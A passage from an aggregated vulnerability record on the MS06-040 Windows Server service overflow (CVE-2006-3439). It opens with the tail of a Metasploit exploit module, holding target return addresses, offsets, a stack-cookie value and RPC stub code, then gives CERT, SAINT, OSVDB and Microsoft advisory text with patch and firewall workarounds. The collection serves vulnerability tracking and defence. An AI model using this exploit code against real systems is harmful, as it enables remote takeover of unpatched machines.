'Targets' =>\n [\n [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],\n [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',\n {\n 'Offset' => 1000,\n 'Ret' => 0x00020804\n }\n ],\n [ '(wcscpy) Windows XP SP0/SP1',\n {\n 'Offset' => 612,\n 'Ret' => 0x00020804\n }\n ],\n [ '(stack) Windows XP SP1 English',\n {\n 'OffsetA' => 656,\n 'OffsetB' => 680,\n 'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll\n }\n ],\n [ '(stack) Windows XP SP1 Italian',\n {\n 'OffsetA' => 656,\n 'OffsetB' => 680,\n 'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll\n }\n ],\n [ '(wcscpy) Windows 2003 SP0',\n {\n 'Offset' => 612,\n 'Ret' => 0x00020804\n }\n ],\n ],\n\n 'DisclosureDate' => 'Aug 8 2006'))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']),\n ])\n\n end\n\n def exploit\n\n connect()\n smb_login()\n\n mytarget = target\n if (not target) or (target.name =~ /Automatic/)\n case smb_peer_os()\n when 'Windows 5.0'\n print_status(\"Detected a Windows 2000 target\")\n mytarget = targets[1]\n\n when 'Windows NT 4.0'\n print_status(\"Detected a Windows NT 4.0 target\")\n mytarget = targets[1]\n\n when 'Windows 5.1'\n begin\n smb_create(\"\\\\SRVSVC\")\n print_status(\"Detected a Windows XP SP0/SP1 target\")\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n if (e.error_code == 0xc0000022)\n print_status(\"Windows XP SP2 is not exploitable\")\n return\n end\n print_status(\"Detected a Windows XP target (unknown patch level)\")\n print_status(\"To exploit this system, \\\"set TARGET 2\\\" and run this exploit again\")\n end\n return\n\n when /Windows Server 2003 (\\d+)$/\n print_status(\"Detected a Windows 2003 SP0 target, but have not confirmed English language\")\n print_status(\"To exploit this system, \\\"set TARGET 5\\\" and run this exploit again\")\n # mytarget = targets[5]\n return\n\n when /Windows Server 2003 (\\d+) Service Pack (\\d+)/\n print_status(\"Windows 2003 SP#{$2} is not exploitable\")\n return\n\n when /Samba/\n print_status(\"Samba is not vulnerable\")\n return\n\n else\n print_status(\"No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...\")\n return\n end\n end\n\n # Specific fixups for Windows NT\n case smb_peer_os()\n when 'Windows NT 4.0'\n print_status(\"Adjusting the SMB/DCERPC parameters for Windows NT\")\n datastore['SMB::pipe_write_min_size'] = 2048\n datastore['SMB::pipe_write_max_size'] = 4096\n end\n\n handle = dcerpc_handle(\n '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n #\n # /* Function 0x1f at 0x767e912c */\n # long function_1f (\n # [in] [unique] [string] wchar_t * arg_00,\n # [in] [string] wchar_t * arg_01,\n # [out] [size_is(arg_03)] char * arg_02,\n # [in] [range(0, 64000)] long arg_03,\n # [in] [string] wchar_t * arg_04,\n # [in,out] long * arg_05,\n # [in] long arg_06\n # );\n #\n\n print_status(\"Building the stub data...\")\n stub = ''\n\n case mytarget.name\n\n # This covers NT 4.0 as well\n when /wcscpy.*Windows 2000/\n\n code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded\n\n path = code + ( [mytarget.ret].pack('V') * 16 ) + \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(250)+1) +\n NDR.UnicodeConformantVaryingStringPreBuilt(\"\\xeb\\x02\\x00\\x00\") +\n NDR.long(rand(250)+1) +\n NDR.long(0)\n\n when /wcscpy.*Windows XP/\n path =\n # Payload goes first\n payload.encoded +\n\n # Padding\n rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\n\n # Land 6 bytes in to bypass garbage (XP SP0)\n [ mytarget.ret + 6 ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(8) +\n\n # Address to write our shellcode (XP SP0)\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(32) +\n\n # Jump straight to shellcode (XP SP1)\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(8) +\n\n # Address to write our shellcode (XP SP1)\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(32) +\n\n # Terminate the path\n \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(0xf0)+1) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.long(rand(0xf0)+1) +\n NDR.long(0)\n\n\n when /stack/\n buff = rand_text_alphanumeric(800)\n buff[0, payload.encoded.length] = payload.encoded\n buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')\n buff[ mytarget['OffsetB'], 5 ] = \"\\xe9\" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')\n\n path = \"\\\\\\x00\\\\\\x00\" + buff + \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(0xf0)+1) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.long(rand(0xf0)+1) +\n NDR.long(0)\n\n\n when /wcscpy.*Windows 2003/\n path =\n # Payload goes first\n payload.encoded +\n\n # Padding\n rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\n\n # Padding\n rand_text_alphanumeric(32) +\n\n # The cookie is constant,\n # noticed by Nicolas Pouvesle in Misc #28\n \"\\x4e\\xe6\\x40\\xbb\" +\n\n # Padding\n rand_text_alphanumeric(4) +\n\n # Jump straight to shellcode\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(8) +\n\n # Address to write our shellcode\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(40) +\n\n # Terminate the path\n \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(0xf0)+1) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.long(rand(0xf0)+1) +\n NDR.long(0)\n\n end\n\n print_status(\"Calling the vulnerable function...\")\n\n begin\n dcerpc.call(0x1f, stub, false)\n dcerpc.call(0x1f, stub, false)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n rescue => e\n if e.to_s !~ /STATUS_PIPE_DISCONNECTED/\n raise e\n end\n end\n\n # Cleanup\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms06_040_netapi.rb"}], "cert": [{"lastseen": "2019-10-09T19:51:28", "bulletinFamily": "info", "description": "### Overview \n\nA stack-based buffer overflow exists in the Microsoft Server service. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code with `SYSTEM` privileges.[](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/microsoft_rpc_model.asp>)\n\n### Description \n\n**Microsoft Server Service**\n\n[MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>) includes the following information: \n \n_The Server service provides RPC support, file print support and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC. _ \n**Microsoft Remote Procedure Call (MS RPC) and Server Message Block (SMB)** \n \nRPC [](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/microsoft_rpc_model.asp>)provides a mechanism that allows a program to execute a procedure on a remote system in a way that is transparent to the calling program. MS RPC is the Microsoft implementation of RPC. Windows services that use MS RPC may use SMB named pipes as the transport service for MS RPC calls. \n \n**The Problem** \n \nA stack-based buffer overflow exists in the Microsoft Server service. If a remote attacker sends a specially crafted packet to a vulnerable Windows system, that attacker may be able to trigger the buffer overflow. \n \nNote that we have received reports that this vulnerability is actively being exploited. \n \nMore information, including a list of affected versions of Windows, is available in Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). We have confirmed that this vulnerability affects Windows NT4. However, according to Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>): \n \n_Windows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following _[_Microsoft Support Lifecycle Web site_](<http://go.microsoft.com/fwlink/?LinkId=21742>)_. For more information about the extended security update support period for these operating system versions, visit the _[_Microsoft Product Support Services Web site_](<http://go.microsoft.com/fwlink/?LinkId=33328>)_. _ \nWindows NT4 users should observe the workarounds below as well as the recommendations in the [Microsoft Windows NT 4.0 and Windows 98 Threat Mitigation Guide](<http://www.microsoft.com/technet/security/topics/networksecurity/threatmi.mspx>)**.** \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with `SYSTEM` privileges. \n \n--- \n \n### Solution \n\n**Apply a patch from Microsoft**\n\nMicrosoft addresses this vulnerability with the updates listed in Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n \nMicrosoft has released a new version of Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/Bulletin/MS06-040.mspx>) and the associated security updates. The new version corrects the problem described in Microsoft Knowledge Base Article [921883](<http://support.microsoft.com/kb/921883>). Programs that request large amounts of contiguous memory running on Windows Server 2003 SP1 and Windows XP Professional x64 Edition systems with the previous version of the MS06-040 update installed could crash. \n \n--- \n \nUntil a patch can be applied, the following actions may reduce the chances of exploitation:\n\n \n**Block or Restrict Access** \n \nBlock access to SMB services (139/tcp, 445/tcp) from untrusted networks such as the Internet. \n \n**Restrict anonymous access** \n \nRestrict anonymous SMB access. See Microsoft Knowledge Base Article [246261](<http://support.microsoft.com/support/kb/articles/Q246/2/61.asp>) for information about configuring anonymous access in Windows 2000. Note this will not prevent authenticated users from exploiting this vulnerability, and may have adverse affects in mixed-mode domains. Anonymous SMB access to SAM accounts is restricted in Windows XP and Windows Server 2003 by default. \n \nOther workarounds are available in Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n \n--- \n \n### Vendor Information\n\n650769\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nUpdated: August 03, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>\n * <http://support.microsoft.com/kb/246261/>\n * <http://support.microsoft.com/kb/328459/>\n * <http://blogs.technet.com/msrc/archive/2006/08/15/446848.aspx>\n * <http://www.microsoft.com/technet/security/topics/networksecurity/threatmi.mspx>\n\n### Acknowledgements\n\nThis vulnerability was reported in Microsoft Security Bulletin MS06-040.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3439](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3439>) \n---|--- \n**Severity Metric:****** | 58.28 \n**Date Public:** | 2006-08-08 \n**Date First Published:** | 2006-08-08 \n**Date Last Updated: ** | 2006-09-18 17:19 UTC \n**Document Revision: ** | 81 \n", "modified": "2006-09-18T17:19:00", "published": "2006-08-08T00:00:00", "id": "VU:650769", "href": "https://www.kb.cert.org/vuls/id/650769", "type": "cert", "title": "Microsoft Windows Server service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T17:19:47", "bulletinFamily": "exploit", "description": "Added: 08/11/2006 \nCVE: [CVE-2006-3439](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439>) \nBID: [19409](<http://www.securityfocus.com/bid/19409>) \nOSVDB: [27845](<http://www.osvdb.org/27845>) \n\n\n### Background\n\nThe Windows Server Service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability in the Windows Server Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 and Windows XP SP1. Target computer may reboot after connection is closed. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-08-11T00:00:00", "published": "2006-08-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_server_service", "id": "SAINT:FAA2D7963586117985DEDCB8ABB67809", "type": "saint", "title": "Windows Server Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "description": "Added: 08/11/2006 \nCVE: [CVE-2006-3439](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439>) \nBID: [19409](<http://www.securityfocus.com/bid/19409>) \nOSVDB: [27845](<http://www.osvdb.org/27845>) \n\n\n### Background\n\nThe Windows Server Service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability in the Windows Server Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 and Windows XP SP1. Target computer may reboot after connection is closed. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-08-11T00:00:00", "published": "2006-08-11T00:00:00", "id": "SAINT:196A97F73EEF3B5D1EFCFB0026B813A8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_server_service", "title": "Windows Server Service buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 08/11/2006 \nCVE: [CVE-2006-3439](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439>) \nBID: [19409](<http://www.securityfocus.com/bid/19409>) \nOSVDB: [27845](<http://www.osvdb.org/27845>) \n\n\n### Background\n\nThe Windows Server Service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability in the Windows Server Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 and Windows XP SP1. Target computer may reboot after connection is closed. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-08-11T00:00:00", "published": "2006-08-11T00:00:00", "id": "SAINT:CF84C615CA476A001FFE4FD66C27D477", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_server_service", "type": "saint", "title": "Windows Server Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nA buffer overflow exists in Windows. The Server service fails to validate RPC messages resulting in a buffer overflow. With a specially crafted RPC message, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft Windows 2000, XP & Server 2003 Server Service Crafted RPC Message Remote Overflow\n## References:\n[Secunia Advisory ID:21388](https://secuniaresearch.flexerasoftware.com/advisories/21388/)\nNews Article: http://www.eweek.com/article2/0,1895,2002966,00.asp\nNews Article: http://www.techworld.com/security/news/index.cfm?newsID=6581\nNews Article: http://news.com.com/2100-7348_3-6103805.html?part=rss&tag=6103805&subj=news\nNews Article: http://www.infoworld.com/article/06/08/09/HNmspatchdhs_1.html\nMicrosoft Security Bulletin: MS06-040\nMicrosoft Knowledge Base Article: 921883\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2223\nFrSIRT Advisory: ADV-2006-3210\n[CVE-2006-3439](https://vulners.com/cve/CVE-2006-3439)\nCERT VU: 650769\n", "modified": "2006-08-08T14:35:02", "published": "2006-08-08T14:35:02", "href": "https://vulners.com/osvdb/OSVDB:27845", "id": "OSVDB:27845", "title": "Microsoft Windows Server Service Crafted RPC Message Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS06-040\r\nVulnerability in Server Service Could Allow Remote Code Execution (921883)\r\nPublished: August 8, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a privately disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nAn attacker who successfully exploited the vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWe recommend that customers apply the update immediately\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nBuffer Overrun in Server Service Vulnerability - CVE-2006-3439\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The security updates for Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1\r\n\u2022\t\r\n\r\nThe Windows Server 2003 and Windows Server 2003 Service Pack 1 for Itanium-based Systems severity rating are the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nFor more information, visit the Windows Operating System FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nFor more information about MBSA, visit the MBSA Web site.\r\n\r\nFor more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nWhat is the Enterprise Update Scan Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scan Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scan Tool is created for a specific bulletin, customers can run the tool from a command-line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nSMS uses MBSA for detection. Therefore, SMS has the same limitation that is listed earlier in this bulletin related to programs that MBSA does not detect.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nBuffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\r\nThere is a remote code execution vulnerability in Server Service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.\r\n\t\r\nMitigating Factors for Buffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Buffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall:\r\n\r\nThis port is used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, visit the following Web site.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, use a personal firewall, such as the Internet Connection Firewall, which is included with Windows XP and with Windows Server 2003.\r\n\r\nBy default, the Internet Connection Firewall feature in Windows XP and in Windows Server 2003 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet. In Windows XP Service Pack 2 this feature is called the Windows Firewall.\r\n\r\nTo enable the Internet Connection Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Network and Internet Connections, and then click Setup or change your home or small office network. The Internet Connection Firewall feature is enabled when you select a configuration in the Network Setup Wizard that indicates that your system is connected directly to the Internet.\r\n\r\nTo configure Internet Connection Firewall manually for a connection, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Networking and Internet Connections, and then click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nRight-click the connection on which you want to enable Internet Connection Firewall, and then click Properties.\r\n\r\n4.\r\n\t\r\n\r\nClick the Advanced tab.\r\n\r\n5.\r\n\t\r\n\r\nClick to select the Protect my computer or network by limiting or preventing access to this computer from the Internet check box, and then click OK.\r\n\r\nNote If you want to enable certain programs and services to communicate through the firewall, click Settings on the Advanced tab, and then select the programs, the protocols, and the services that are required.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, enable advanced TCP/IP filtering on systems that support this feature.\r\n\r\nYou can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, block the affected ports by using IPSec on the affected 